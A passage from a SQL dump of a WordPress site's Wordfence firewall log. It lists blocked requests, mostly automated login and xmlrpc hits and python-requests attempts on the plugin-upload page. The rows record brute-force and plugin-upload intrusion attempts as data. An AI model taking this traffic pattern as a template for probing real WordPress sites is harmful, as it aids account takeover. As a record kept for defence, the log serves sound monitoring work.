Network',NULL),(11223,1630771213.050607,1630771212.960500,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11224,0.000000,1630771240.574090,'\0\0\0\0\0\0\0\0\0\0��\r�V�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11225,0.000000,1630771374.326019,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11226,1630771405.739770,1630771405.594100,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11227,0.000000,1630771488.851902,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11228,0.000000,1630771685.005552,'\0\0\0\0\0\0\0\0\0\0��\"��q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11229,0.000000,1630771916.619384,'\0\0\0\0\0\0\0\0\0\0���=�M',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11230,0.000000,1630771990.599421,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11231,1630772015.174788,1630772015.084000,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11232,0.000000,1630772139.868110,'\0\0\0\0\0\0\0\0\0\0��ν�:',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11233,0.000000,1630772348.871052,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11234,0.000000,1630772590.873132,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11235,0.000000,1630772779.420416,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11236,0.000000,1630773008.749984,'\0\0\0\0\0\0\0\0\0\0��w4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11237,0.000000,1630773196.006625,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11238,0.000000,1630773337.034138,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11239,0.000000,1630773433.010333,'\0\0\0\0\0\0\0\0\0\0��6\'�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11240,0.000000,1630773618.686915,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11241,0.000000,1630773806.158472,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11242,0.000000,1630773987.684667,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11243,0.000000,1630774194.271708,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11244,0.000000,1630774381.143784,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11245,0.000000,1630774574.030070,'\0\0\0\0\0\0\0\0\0\0��Wk�6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11246,0.000000,1630774928.766873,'\0\0\0\0\0\0\0\0\0\0���q�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11247,0.000000,1630775102.141424,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11248,0.000000,1630775266.644411,'\0\0\0\0\0\0\0\0\0\0���Q�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11249,0.000000,1630775269.984801,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11250,1630775393.115849,1630775393.026200,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11251,0.000000,1630775460.786912,'\0\0\0\0\0\0\0\0\0\0���GE�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11252,0.000000,1630775645.187337,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11253,0.000000,1630775804.154591,'\0\0\0\0\0\0\0\0\0\0��g�ʖ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11254,0.000000,1630776010.871431,'\0\0\0\0\0\0\0\0\0\0��3���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11255,0.000000,1630776175.844336,'\0\0\0\0\0\0\0\0\0\0���%{<',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11256,0.000000,1630776351.192679,'\0\0\0\0\0\0\0\0\0\0��g*:f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11257,0.000000,1630776538.462105,'\0\0\0\0\0\0\0\0\0\0��@%4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11258,0.000000,1630776706.731199,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11259,0.000000,1630776890.960397,'\0\0\0\0\0\0\0\0\0\0��\\5x�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11260,0.000000,1630777047.479019,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11261,0.000000,1630777063.733586,'\0\0\0\0\0\0\0\0\0\0��h�P�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11262,1630777083.152394,1630777083.033300,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11263,0.000000,1630777225.199787,'\0\0\0\0\0\0\0\0\0\0��pJ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11264,0.000000,1630777375.822760,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11265,0.000000,1630777425.468094,'\0\0\0\0\0\0\0\0\0\0��[��K',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11266,1630777432.775480,1630777432.687500,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11267,0.000000,1630777609.808564,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11268,0.000000,1630777784.651644,'\0\0\0\0\0\0\0\0\0\0����;',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11269,0.000000,1630777954.018513,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11270,0.000000,1630778109.368715,'\0\0\0\0\0\0\0\0\0\0����N',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11271,0.000000,1630778296.798556,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11272,0.000000,1630778460.658540,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11273,0.000000,1630778652.407066,'\0\0\0\0\0\0\0\0\0\0���c9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11274,0.000000,1630778827.415660,'\0\0\0\0\0\0\0\0\0\0���ŃB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11275,0.000000,1630778993.284669,'\0\0\0\0\0\0\0\0\0\0���Q�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11276,0.000000,1630779189.007409,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11277,0.000000,1630779364.185363,'\0\0\0\0\0\0\0\0\0\0��4���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11278,0.000000,1630779531.804732,'\0\0\0\0\0\0\0\0\0\0��hƬD',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11279,0.000000,1630779688.732618,'\0\0\0\0\0\0\0\0\0\0��D�\n9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11280,0.000000,1630779775.127926,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11281,0.000000,1630779895.117795,'\0\0\0\0\0\0\0\0\0\0��B��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11282,0.000000,1630780042.297117,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11283,0.000000,1630780061.517306,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11284,1630780093.447465,1630780093.328700,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11285,0.000000,1630780240.362832,'\0\0\0\0\0\0\0\0\0\0����L�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11286,0.000000,1630780418.502671,'\0\0\0\0\0\0\0\0\0\0��#Ɖ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11287,0.000000,1630780595.804241,'\0\0\0\0\0\0\0\0\0\0���.{*',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11288,0.000000,1630780772.070236,'\0\0\0\0\0\0\0\0\0\0���>	z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11289,0.000000,1630781373.008487,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11290,0.000000,1630782590.998855,'\0\0\0\0\0\0\0\0\0\0���zɁ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11291,0.000000,1630782598.962349,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11292,1630782658.506472,1630782658.418700,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11293,0.000000,1630783378.053797,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11294,0.000000,1630784177.172464,'\0\0\0\0\0\0\0\0\0\0��^x�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11295,0.000000,1630784980.314677,'\0\0\0\0\0\0\0\0\0\0��(E��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11296,0.000000,1630785327.289432,'\0\0\0\0\0\0\0\0\0\0��N�(R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11297,0.000000,1630785782.038068,'\0\0\0\0\0\0\0\0\0\0���^�M',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11298,0.000000,1630786585.575264,'\0\0\0\0\0\0\0\0\0\0���75�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11299,0.000000,1630790731.361755,'\0\0\0\0\0\0\0\0\0\0����y',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11300,0.000000,1630791172.499078,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11301,0.000000,1630791557.109517,'\0\0\0\0\0\0\0\0\0\0�����@',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11302,0.000000,1630793077.502559,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11303,0.000000,1630793831.306238,'\0\0\0\0\0\0\0\0\0\0���ŝ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11304,0.000000,1630794462.652635,'\0\0\0\0\0\0\0\0\0\0����\"�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11305,0.000000,1630794579.357705,'\0\0\0\0\0\0\0\0\0\0��#�,&',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11306,0.000000,1630794877.990196,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11307,0.000000,1630795281.551835,'\0\0\0\0\0\0\0\0\0\0��hǒ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11308,0.000000,1630795345.864370,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11309,0.000000,1630795721.112777,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11310,0.000000,1630796109.814601,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 